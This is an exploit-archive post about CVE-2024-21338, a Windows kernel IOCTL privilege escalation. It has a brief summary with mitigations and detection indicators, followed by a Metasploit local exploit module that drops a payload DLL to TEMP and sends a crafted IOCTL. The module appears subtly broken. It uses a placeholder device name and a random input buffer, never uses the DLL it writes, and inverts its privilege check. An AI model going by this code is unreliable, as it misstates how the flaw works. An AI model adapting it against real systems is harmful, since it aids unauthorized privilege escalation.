=============================================================================================================================================
| # Title     : Windows 11 Pro 23H2 Kernel IOCTL Access Control Vulnerability Exploit                                                       |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
| # Vendor    : System built‑in component. No standalone download available.                                                                |
=============================================================================================================================================

POC : 

[+] References : https://packetstorm.news/files/id/177869/ & CVE-2024-21338


[+] Summary : 
          
         CVE-2024-21338 is a security vulnerability in the Microsoft Windows Kernel involving insufficient access control for IOCTL (Input/Output Control) handlers. 
         This vulnerability allows non-privileged users to access kernel-level functionality that should be restricted, potentially leading to privilege escalation.
		 
Technical Details:

    Vulnerability Type: Insufficient Access Control

    Attack Vector: Local

    Privileges Required: Low

    Impact: Privilege Escalation


Affected Systems:

    Windows 10 (various versions)

    Windows 11 (various versions)

    Windows Server 2019/2022

Key Components:

    Vulnerable Component: Windows Kernel IOCTL handlers

    Attack Mechanism: Direct kernel object manipulation

    Exploitation: Through device driver interface

Exploitation Flow:
text

1. Identify vulnerable IOCTL handlers
2. Open handle to vulnerable device driver
3. Craft malicious IOCTL requests
4. Bypass access control checks
5. Execute arbitrary code in kernel context

Mitigation Strategies:

    Apply Security Updates: Install Microsoft January 2024 security patches

    Driver Whitelisting: Implement driver signature enforcement

    Access Control: Restrict access to device interfaces

    Monitoring: Monitor for suspicious driver activity

Detection Indicators:

    Unusual IOCTL requests to kernel drivers

    Attempts to access privileged device interfaces

    Unexpected driver loading patterns
	
[+] POC :  

#############################################
# Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338
# Author: indoushka
#############################################

require 'msf/core'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
        'Description' => %q{
          This module exploits an insufficient access control vulnerability in the Windows Kernel
          through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
          kernel-level functionality leading to privilege escalation.
        },
        'Author' => ['indoushka'],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338'],
          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-21338']
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X64],
        'SessionTypes' => ['meterpreter'],
        'Payload' => {
          'Space' => 4096,
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Windows 10/11 x64',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'win'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'DisclosureDate' => '2024-01-09',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('DEVICE_NAME', [true, 'Vulnerable device name', '\\\\.\\VulnerableDriver']),
      OptInt.new('IOCTL_CODE', [true, 'Vulnerable IOCTL code', 0x222003])
    ])
  end

  def check

    if sysinfo['OS'] !~ /windows/i
      return CheckCode::Safe('Target is not a Windows system')
    end

    if sysinfo['Architecture'] !~ /x64/
      return CheckCode::Safe('Target architecture is not supported')
    end

    unless is_system?
      return CheckCode::Detected('User does not have SYSTEM privileges')
    end

    device_path = datastore['DEVICE_NAME']
    if device_exists?(device_path)
      return CheckCode::Appears('Vulnerable device driver detected')
    else
      return CheckCode::Safe('Vulnerable device driver not found')
    end
  end

  def exploit
    print_status("Starting exploitation for CVE-2024-21338")

    unless check == CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    print_status("Generating payload...")
    payload_data = generate_payload_dll

    temp_path = "#{get_env('TEMP')}\\#{Rex::Text.rand_text_alpha(8)}.dll"
    print_status("Writing payload to #{temp_path}")
    write_file(temp_path, payload_data)
    register_file_for_cleanup(temp_path)

    print_status("Triggering vulnerability via IOCTL...")
    if trigger_exploit(temp_path)
      print_good("Exploitation successful!")
    else
      fail_with(Failure::Unknown, "Exploitation failed")
    end
  end

  private

  def device_exists?(device_path)
    begin
      file = client.railgun.kernel32.CreateFileA(
        device_path,
        'GENERIC_READ',
        'FILE_SHARE_READ|FILE_SHARE_WRITE',
        nil,
        'OPEN_EXISTING',
        'FILE_ATTRIBUTE_NORMAL',
        0
      )
      
      if file['return'] != client.railgun.const('INVALID_HANDLE_VALUE')
        client.railgun.kernel32.CloseHandle(file['return'])
        return true
      end
    rescue
      return false
    end
    
    false
  end

  def trigger_exploit(payload_path)
    begin

      device_handle = client.railgun.kernel32.CreateFileA(
        datastore['DEVICE_NAME'],
        'GENERIC_READ | GENERIC_WRITE',
        0,
        nil,
        'OPEN_EXISTING',
        0,
        0
      )

      if device_handle['return'] == client.railgun.const('INVALID_HANDLE_VALUE')
        print_error("Failed to open device handle")
        return false
      end

      buffer_size = 1024
      input_buffer = Rex::Text.rand_text_alpha(buffer_size)
      ioctl_result = client.railgun.kernel32.DeviceIoControl(
        device_handle['return'],
        datastore['IOCTL_CODE'],
        input_buffer,
        input_buffer.length,
        nil,
        0,
        4,
        nil
      )

      client.railgun.kernel32.CloseHandle(device_handle['return'])

      if ioctl_result['return']
        print_good("IOCTL sent successfully")
        return true
      else
        print_error("IOCTL failed")
        return false
      end

    rescue => e
      print_error("Exploitation error: #{e.message}")
      return false
    end
  end
end

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================